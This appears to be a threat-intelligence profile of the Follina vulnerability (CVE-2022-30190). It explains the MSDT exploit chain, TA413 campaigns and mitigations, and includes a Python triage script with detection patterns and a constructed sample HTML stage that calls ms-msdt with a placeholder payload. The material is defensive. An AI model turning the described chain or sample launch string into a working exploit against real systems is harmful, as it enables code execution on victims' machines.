CVE-2022-30190

Vulnerability updated 4 months ago (2024-05-04T19:12:34.566Z)
CVE-2022-30190, also known as the "Follina" vulnerability, is a remote code execution flaw in the Microsoft Support Diagnostic Tool (MSDT) with a CVSS base score of 7.8 (high). It was disclosed as a zero-day in May 2022; Microsoft published guidance on 30 May 2022 and shipped a fix in the June 2022 security updates.

The flaw is reachable from an Office document without macros. The document carries an external OLE object relationship that points at an attacker-controlled HTML file; when the document is opened (the RTF variant can also fire from the Windows Explorer preview pane), the HTML is fetched and invokes the ms-msdt: URL protocol handler, and MSDT runs the attacker-supplied PowerShell embedded in the handler's parameters with the privileges of the calling application.

TA413 weaponized the vulnerability shortly after its publication. Their exploitation begins with a spear-phishing email carrying a malicious Excel spreadsheet attachment; when opened, the document uses the vulnerability to download an MSI package from a remote server. During the first half of 2022 TA413 also exploited a since-patched zero-day in the Sophos Firewall product (CVE-2022-1040) and deployed a newly observed custom backdoor, LOWZERO, in campaigns targeting Tibetan entities. In June 2022 the group switched from malicious VBA code to a Follina exploit for initial code execution.

Follina has been widely exploited beyond TA413, for example weaponized inside a Microsoft Office document to drop the Woody RAT malware, and it appears alongside PrintNightmare (CVE-2021-34527) in reporting on the most frequently exploited vulnerabilities, which is the practical measure of the risk it poses to Microsoft users.

Checks and mitigations: the fix is part of the June 2022 cumulative updates, so OS patch level is the primary control. Microsoft's interim workaround was to disable the ms-msdt URL protocol by exporting and then deleting the HKEY_CLASSES_ROOT\ms-msdt registry key. The Defender attack surface reduction rule that blocks Office applications from creating child processes also stops the observed chain, and process telemetry showing msdt.exe spawned by an Office process, followed by sdiagnhost.exe launching the payload, is a high-fidelity detection.
Description last updated: 2024-05-04T16:36:48.400Z
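The document-side indicator described above (an oleObject relationship with TargetMode="External" pointing at a remote HTML file, which in turn redirects to an ms-msdt: URI) can be checked offline. The triage script below is an added example written for this page, not code from the original description or from any vendor report; the .docx fixtures and the HTML snippet are constructed in-memory with a placeholder host and a harmless /param value, and the function names are the author's own.

```python
"""Triage a .docx for the external-OLE indicator used by Follina (CVE-2022-30190).

Added example for this page. Fixtures are constructed, not real samples.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# The fetched HTML in the public chain redirects to an ms-msdt: URI that launches the
# PCWDiagnostic troubleshooter; the IT_BrowseForFile parameter carries a $( ... ) subexpression.
MSDT_LAUNCH_RE = re.compile(r"ms-msdt:\s*/?id\s+PCWDiagnostic", re.IGNORECASE)
MSDT_PARAM_RE = re.compile(r"IT_BrowseForFile\s*=\s*\$\(", re.IGNORECASE)


def external_ole_targets(docx_bytes):
    """Return [(rels part, Id, Target)] for every oleObject relationship whose target lies
    outside the package. A normal embedded object targets word/embeddings/...; Follina
    documents target an http(s) URL (the public sample's URL ended in '!')."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter("{%s}Relationship" % PKG_NS):
                if rel.get("Type") == OLE_REL_TYPE and rel.get("TargetMode", "Internal") == "External":
                    hits.append((part, rel.get("Id"), rel.get("Target")))
    return hits


def classify_payload(html_text):
    """Tag fetched HTML: 'msdt-launch' if it invokes the ms-msdt: handler, plus
    'powershell-subexpr' if the /param string carries a $( ... ) subexpression."""
    tags = set()
    if MSDT_LAUNCH_RE.search(html_text):
        tags.add("msdt-launch")
    if MSDT_PARAM_RE.search(html_text):
        tags.add("powershell-subexpr")
    return tags


def _docx_with_rels(rels_xml):
    """Build a minimal .docx in memory (constructed fixture, hypothetical helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                    '<Default Extension="xml" ContentType="application/xml"/></Types>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                    '<w:body/></w:document>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def follina_style_docx():
    """Constructed sample: one oleObject relationship pointing at a remote HTML (placeholder host)."""
    return _docx_with_rels(
        '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="%s">'
        '<Relationship Id="rId996" Type="%s" Target="https://files.example.invalid/RDF842l.html!" TargetMode="External"/>'
        '</Relationships>' % (PKG_NS, OLE_REL_TYPE))


def benign_docx():
    """Constructed sample: an ordinary OLE object embedded inside the package."""
    return _docx_with_rels(
        '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="%s">'
        '<Relationship Id="rId5" Type="%s" Target="embeddings/oleObject1.bin"/>'
        '</Relationships>' % (PKG_NS, OLE_REL_TYPE))


# Constructed stand-in for the fetched HTML stage; the /param value is a harmless placeholder.
SAMPLE_HTML = ('<html><body><script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force '
               '/param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(placeholder)\\"";'
               '</script></body></html>')


def triage(docx_bytes, fetched_html=None):
    """Combine both checks: 'clean', 'suspicious-external-ole', or 'follina-chain'."""
    if not external_ole_targets(docx_bytes):
        return "clean"
    tags = classify_payload(fetched_html) if fetched_html else set()
    return "follina-chain" if "msdt-launch" in tags else "suspicious-external-ole"


if __name__ == "__main__":
    for name, doc in (("follina-style", follina_style_docx()), ("benign", benign_docx())):
        print(name, external_ole_targets(doc), triage(doc, SAMPLE_HTML))
```

An external oleObject relationship is rare in legitimate documents and is worth escalating on its own; the HTML check only confirms which payload family was behind it when the second stage was captured by a proxy or sandbox. The same relationship scan applies to .xlsx and .pptx packages, since they share the OPC relationship format.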
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
ID (votes): Profile Description
Follina (9 votes): Follina, also known as CVE-2022-30190, is a notable software vulnerability that was discovered and exploited in the first half of 2022. This flaw, found in the Microsoft Windows Support Diagnostic Tool (MSDT), was weaponized by TA413, a cyber threat actor group with suspected ties to China. The grou
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Tags: Vulnerability, Exploit, Microsoft, Exploits, exploited
Associated Malware
ID, type (votes): Profile Description
Lokibot, Unspecified (2 votes): LokiBot is an information-stealing malware family that has been in circulation since 2015. It infiltrates systems through malicious downloads, email attachments, or websites, often without the user's knowledge, and once inside steals personal information
Associated Threat Actors
ID, type (votes): Profile Description
APT28, Unspecified (2 votes): APT28, also known as Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM, is a threat actor linked to Russia that has been active since at least 2007. The group has targeted governments, militaries, and security organizations worldwide, including the German Social Democratic Party
Associated Vulnerabilities
ID, type (votes): Profile Description
Log4Shell, Unspecified (3 votes): Log4Shell is a significant software vulnerability that exists within the Log4j Java-based logging utility. The vulnerability, officially designated as CVE-2021-44228, allows potential attackers to execute arbitrary code on targeted systems. Advanced Persistent Threat (APT) actors, including LockBit
Proxyshell, Unspecified (3 votes): ProxyShell is a series of vulnerabilities affecting Microsoft Exchange email servers. These flaws in software design or implementation have been exploited by threat actors to gain unauthorized access and control over targeted systems. The ProxyShell vulnerability, officially tracked as CVE-2021-3447
Source Document References
Information about the CVE-2022-30190 vulnerability was read from the documents listed below (display limited to 20 results).
Source (created): Title
Securelist (17 days ago): Analyzing the vulnerability landscape in Q2 2024
DARKReading (a month ago): Russia's 'Fighting Ursa' APT Uses Car Ads to Install HeadLace Malware
CISA (a month ago): North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs | CISA
Securityaffairs (4 months ago): NATO and the EU formally condemned APT28 cyber espionage
MITRE (9 months ago): Woody RAT: A new feature-rich malware spotted in the wild
Securityaffairs (9 months ago): Russia's APT8 exploited Outlook 0day to target EU NATO members
Securityaffairs (9 months ago): Russia-linked APT28 group spotted exploiting Outlook flaw to hijack MS Exchange accounts
CERT-EU (10 months ago): Several French critical networks subjected to Russian APT attacks
CERT-EU (10 months ago): How APT28 Infiltrates Networks in French Universities & Nuclear Plants Without Detection
Securityaffairs (10 months ago): ANSSI warns of Russia-linked APT28 attacks on French entities
CERT-EU (a year ago): The Hidden Dangers of Remote Code Execution (RCE) Exploits in Word Documents
CERT-EU (a year ago): LokiBot Information Stealer Packs Fresh Infection Strategies
CERT-EU (a year ago): Malspam attacks up, new sectors targeted – report
CERT-EU (a year ago): nao-sec.org
CERT-EU (a year ago): GroundPeony Group Exploiting Zero-day Flaw to Attack Government Agencies
CERT-EU (a year ago): GroundPeony Group Exploiting Zero-day Flaw to Attack Government Agencies | IT Security News
CERT-EU (a year ago): Uncovering the internet's most enduring threat: The Email Threat Landscape
Malwarebytes (a year ago): 2022's most routinely exploited vulnerabilities—history repeats
BankInfoSecurity (a year ago): Patching Conundrum: 5-Year Old Flaw Again Tops Most-Hit List
CERT-EU (a year ago): Five Eyes Agencies Call Attention to Most Frequently Exploited Vulnerabilities